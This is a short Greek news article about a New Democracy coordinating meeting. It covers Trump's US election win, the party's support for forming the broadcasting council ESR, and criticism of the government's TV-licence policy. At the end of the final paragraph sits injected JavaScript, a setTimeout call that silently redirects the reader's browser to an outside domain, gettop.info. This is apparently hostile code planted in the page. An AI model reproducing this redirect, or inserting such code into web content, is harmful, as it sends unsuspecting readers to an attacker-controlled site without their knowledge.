Συνεδρίασε το Συντονιστικό της ΝΔ για ΗΠΑ, ΕΣΡ και οικονομία

0
2

 

Το πρωί συνεδρίασε το Άτυπο Συντονιστικό Όργανο Κοινοβουλευτικού Έργου της Νέας Δημοκρατίας όπου συζητήθηκαν οι εκλογές στις ΗΠΑ, η στάση του κόμματος για τη συγκρότηση του ΕΣΡ αλλά και τα προβλήματα, κυρίως η οικονομική κρίση, που βιώνουν οι πολίτες.

Σύμφωνα με ανακοίνωση της ΝΔ, η εκλογή του Ντόναλντ Τραμπ στην προεδρία των ΗΠΑ, είναι αναμφισβήτητα ένα πολύ σημαντικό διεθνές γεγονός και η επιλογή του αμερικανικού λαού είναι, ασφαλώς, απόλυτα σεβαστή. Όπως σημειώνεται, η Νέα Δημοκρατία προσδοκά στη συνέχιση και ενίσχυση των δεσμών φιλίας και συνεργασίας της Ελλάδας με τις ΗΠΑ.

Όσον αφορά στη συγκρότηση ΕΣΡ επαναβεβαιώθηκε η θέση της ΝΔ πως είναι υπέρ της συγκρότησής του, καθώς και το ότι απαιτείται γι’ αυτό όλα τα μέλη του να ανταποκρίνονται στην ανάγκη για αντικειμενική, αμερόληπτη, ανεξάρτητη λειτουργία, χωρίς κανενός είδους κομματικά «καπελώματα» και πλειοψηφίες.

Όπως τονίστηκε «η κυβέρνηση πρέπει να εγκαταλείψει την εμμονή της σε 4 κανάλια και να επιτρέψει να λειτουργήσει ελεύθερα η αγορά με όσα κανάλια επιτρέπει το ψηφιακό φάσμα» καθώς και «να αφήσει στο χθες το διαγωνισμό που έχει ήδη ακυρωθεί και να καθιερωθεί ένα στάνταρ τίμημα για όλα τα κανάλια που λειτουργούν και θα αποκτήσουν άδεια». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here